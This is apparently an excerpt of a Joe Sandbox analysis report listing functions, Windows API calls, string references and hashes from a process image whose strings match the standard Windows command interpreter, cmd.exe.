SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4DBB
_get_osfhandle.MSVCRT ref: 00007FF7823E4DCA
GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4DE0
_get_osfhandle.MSVCRT ref: 00007FF7823E4DEE
GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4E04

Part of subcall function 00007FF7823E0580: _get_osfhandle.MSVCRT ref: 00007FF7823E0589
Part of subcall function 00007FF7823E0580: SetConsoleMode.KERNELBASE ref: 00007FF7823E059E
Part of subcall function 00007FF7823E0580: _get_osfhandle.MSVCRT ref: 00007FF7823E05AF
Part of subcall function 00007FF7823E0580: GetConsoleMode.KERNELBASE ref: 00007FF7823E05C5
Part of subcall function 00007FF7823E0580: _get_osfhandle.MSVCRT ref: 00007FF7823E05EF
Part of subcall function 00007FF7823E0580: GetConsoleMode.KERNELBASE ref: 00007FF7823E0605
Part of subcall function 00007FF7823E0580: _get_osfhandle.MSVCRT ref: 00007FF7823E0632
Part of subcall function 00007FF7823E0580: SetConsoleMode.KERNELBASE ref: 00007FF7823E0647

Part of subcall function 00007FF7823E4A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A28
Part of subcall function 00007FF7823E4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A66
Part of subcall function 00007FF7823E4A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A7D
Part of subcall function 00007FF7823E4A14: memmove.MSVCRT(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A9A
Part of subcall function 00007FF7823E4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4AA2

Part of subcall function 00007FF7823E4AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823D8798), ref: 00007FF7823E4AD6
Part of subcall function 00007FF7823E4AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823D8798), ref: 00007FF7823E4AEF

Part of subcall function 00007FF7823E5554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF7823E4E35), ref: 00007FF7823E55DA
Part of subcall function 00007FF7823E5554: RegQueryValueExW.KERNELBASE ref: 00007FF7823E5623
Part of subcall function 00007FF7823E5554: RegQueryValueExW.KERNELBASE ref: 00007FF7823E5667
Part of subcall function 00007FF7823E5554: RegQueryValueExW.KERNELBASE ref: 00007FF7823E56BE
Part of subcall function 00007FF7823E5554: RegQueryValueExW.KERNELBASE ref: 00007FF7823E5702

GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4E35
GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4E81
GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4F69
GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4F95
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4FB0
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4FC1
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4FD8
GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4FF8
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E5037
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E504B
GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E50DF
GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E50F2
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E510F
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E5130
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E514A
free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E5175

Part of subcall function 00007FF7823E3578: _get_osfhandle.MSVCRT ref: 00007FF7823E3584
Part of subcall function 00007FF7823E3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E359C
Part of subcall function 00007FF7823E3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35C3
Part of subcall function 00007FF7823E3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35D9
Part of subcall function 00007FF7823E3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35ED
Part of subcall function 00007FF7823E3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E3602

Strings

IsDebuggerPresent, xrefs: 00007FF7823E5122
KERNEL32.DLL, xrefs: 00007FF7823E50EB
CopyFileExW, xrefs: 00007FF7823E5108
SetConsoleInputExeNameW, xrefs: 00007FF7823E5143

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
API String ID: 1049357271-3021193919
Opcode ID: 435433f7253096d870c33aa278a517d18c81e5400009277a10a2e2eb1186a394
Instruction ID: e2b4de068f5b9bd485b54334b7b7e689d55a2f88eac40b734f7ceb225c21face
Opcode Fuzzy Hash: 435433f7253096d870c33aa278a517d18c81e5400009277a10a2e2eb1186a394
Instruction Fuzzy Hash: ACC17A65A08B4296EA44BB11E814179FBA0FF89B53FE44178D90E07B55DFBCE849C330

Function 00007FF7823E37D8 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 269
registrythreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823E380B
OpenThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823E3821
HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823E3845
RegOpenKeyExW.KERNELBASE ref: 00007FF7823E3875
GetConsoleOutputCP.KERNELBASE ref: 00007FF7823E38BF
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E38DD
memset.MSVCRT ref: 00007FF7823E3909
_setjmp.MSVCRT ref: 00007FF7823E3952
GetConsoleOutputCP.KERNELBASE ref: 00007FF7823E398B
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E39A2
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823EEA1F
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823EEA2F

Part of subcall function 00007FF7823E5920: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,?,?,?,00000000,00000000,00000000,00007FF7823EB71F), ref: 00007FF7823E5997
Part of subcall function 00007FF7823E5920: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,?,?,?,00000000,00000000,00000000,00007FF7823EB71F), ref: 00007FF7823E59C5

GetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823EEA41

Strings

Software\Policies\Microsoft\Windows\System, xrefs: 00007FF7823E3867
DisableCMD, xrefs: 00007FF7823EEA18

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
API String ID: 2624720099-1920437939
Opcode ID: 9a4cddc928fe4c71fd6c761995599b2788caccd561f5d3a8cbf937f1688b90ea
Instruction ID: a6f30f1346a20e5f13098fd28a7f24ccb631e9ec35c6971847cb159746e7c9a2
Opcode Fuzzy Hash: 9a4cddc928fe4c71fd6c761995599b2788caccd561f5d3a8cbf937f1688b90ea
Instruction Fuzzy Hash: 58C1AC25F086429AE750BB61E4602B8FBA0FF49712FF4417CD91E57E91DEBCA848C630

Function 00007FF7823E823C Relevance: 15.1, APIs: 10, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF7823E8280
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823E829D

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: ErrorFileFindFirstLast
String ID:
API String ID: 873889042-0
Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
Instruction ID: b32cb9b1789d78b8746b107b373b1966d490181b8ff92c530f75a6c4013879fa
Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
Instruction Fuzzy Hash: 67516179A09B42D6E710AF12E4541B9FBA0FB49B92FE48575CA1D43B60CFBCE854C720

Function 00007FF7823E2978 Relevance: 9.1, APIs: 6, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
Instruction ID: cf0fda47ae1fcaca37bf2931e3d9f99129344a985fc304028f76123f4d90d015
Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
Instruction Fuzzy Hash: 51516D25B0868195EB30AF15E5142BAE690FB54BA1FE44239DE6D07FD0DF7CE449C710

Function 00007FF7823E3C24 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 289
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823E3D0C
towupper.MSVCRT ref: 00007FF7823E3D2F
iswalpha.MSVCRT ref: 00007FF7823E3D4F
towupper.MSVCRT ref: 00007FF7823E3D75
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E3DBF
GetFileAttributesW.KERNELBASE ref: 00007FF7823E3E7E
GetFileAttributesW.KERNELBASE ref: 00007FF7823E3EE9
SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823E3F32
_local_unwind.MSVCRT ref: 00007FF7823E4062
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823E4067
_local_unwind.MSVCRT ref: 00007FF7823E4098
_local_unwind.MSVCRT ref: 00007FF7823E40B3
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823E40B8
_local_unwind.MSVCRT ref: 00007FF7823E40DE
_local_unwind.MSVCRT ref: 00007FF7823E40F9
_local_unwind.MSVCRT ref: 00007FF7823E4114

Strings

:, xrefs: 00007FF7823E3D89

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
String ID: :
API String ID: 1809961153-336475711
Opcode ID: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
Instruction ID: eea14582b966939e525daddcb7a96133027dc7a1bd3874831c9cbf8c375002a0
Opcode Fuzzy Hash: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
Instruction Fuzzy Hash: 74D1943660CB85A1EA60EB15E4642B9F7A1FB84742FD04179DA4E43FA4DFBCE449C720

Function 00007FF7823E2394 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 213
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00007FF7823E23F1

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

GetModuleFileNameW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7823E2438

Part of subcall function 00007FF7823E081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823E084E

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823E24DD
wcschr.MSVCRT ref: 00007FF7823EE12A
_wcsupr.MSVCRT ref: 00007FF7823EE146

Strings

.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC, xrefs: 00007FF7823EE0F4
COMSPEC, xrefs: 00007FF7823E2483, 00007FF7823EE28B
\CMD.EXE, xrefs: 00007FF7823EE22A
KEYS, xrefs: 00007FF7823E2498
PATHEXT, xrefs: 00007FF7823E2459, 00007FF7823EE0FB
PATH, xrefs: 00007FF7823E2444, 00007FF7823EE0E2
$P$G, xrefs: 00007FF7823E2516
PROMPT, xrefs: 00007FF7823E246E, 00007FF7823E251D

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
API String ID: 2622545777-4197029667
Opcode ID: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
Instruction ID: cb338761042c7bd0f67f347705d5db74958590520d1d20d3bb95bcab9aeff1ba
Opcode Fuzzy Hash: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
Instruction Fuzzy Hash: 7891B325B1964295EE64BF11D8602F8A7A0FF48B96FE44179C90E07E95DFBCE948C330

Function 00007FF7823E0580 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_osfhandle.MSVCRT ref: 00007FF7823E0589
SetConsoleMode.KERNELBASE ref: 00007FF7823E059E
_get_osfhandle.MSVCRT ref: 00007FF7823E05AF
GetConsoleMode.KERNELBASE ref: 00007FF7823E05C5
_get_osfhandle.MSVCRT ref: 00007FF7823E05EF
GetConsoleMode.KERNELBASE ref: 00007FF7823E0605
_get_osfhandle.MSVCRT ref: 00007FF7823E0632
SetConsoleMode.KERNELBASE ref: 00007FF7823E0647
_get_osfhandle.MSVCRT ref: 00007FF7823E0684
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7823E0699
_get_osfhandle.MSVCRT ref: 00007FF7823ED891
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7823ED8A6

Strings

CMD.EXE, xrefs: 00007FF7823E065F

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: ConsoleMode_get_osfhandle
String ID: CMD.EXE
API String ID: 1606018815-3025314500
Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
Instruction ID: a74c0930e76aad206f73b3067b884e16ca9d25f029c008ff24f959ef251b67dd
Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
Instruction Fuzzy Hash: 90410E35A09602DBE7446B15E854178BFA0FB8A753FF89178C91E477A4DFBCA848C630

Function 00007FF7823DC620 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 312
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleTitleW.KERNELBASE ref: 00007FF7823DC65E
wcschr.MSVCRT ref: 00007FF7823DC792

Strings

:, xrefs: 00007FF7823DC9E2
/, xrefs: 00007FF7823DCA1B

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: ConsoleTitlewcschr
String ID: /$:
API String ID: 2364928044-4222935259
Opcode ID: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
Instruction ID: 3b5060f0f0f338e586d6c412f36b98331510e08dcf1ea8091f1c33eb779f6140
Opcode Fuzzy Hash: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
Instruction Fuzzy Hash: A8C1E361E2864291EA54BB25D4287BDE2A1FF40B82FF44979DD1E47AD1DFBCE844C320

Function 00007FF7823E8D80 Relevance: 9.1, APIs: 6, Instructions: 95
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF7823E8DC4
_amsg_exit.MSVCRT ref: 00007FF7823E8DE0
_initterm.MSVCRT ref: 00007FF7823E8E64
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF7823E8E91
exit.MSVCRT ref: 00007FF7823E8EDE
_cexit.MSVCRT ref: 00007FF7823E8EED

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
String ID:
API String ID: 4291973834-0
Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
Instruction ID: dc3a7a5768d92eed43a4a366496f30c0b21a541ec11bf80ee71cb4318de85f04
Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
Instruction Fuzzy Hash: C841FA39E08602D2F690BB11E950279A6A0FF88746FE40479D91D47AA1DFFDEC88C770

Function 00007FF7823E4A14 Relevance: 7.5, APIs: 5, Instructions: 49
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A28
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A66
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A7D
memmove.MSVCRT(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A9A
FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4AA2

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
String ID:
API String ID: 1623332820-0
Opcode ID: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
Instruction ID: 3997613204cc3af9422d16ec17921c005e864a1acfdc9a00d026a7f41c8fedd8
Opcode Fuzzy Hash: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
Instruction Fuzzy Hash: 91118F26A14B4282DA50AB02F414139BFA0FB8DF91BA99078DF4E03B44DE7DE885D760

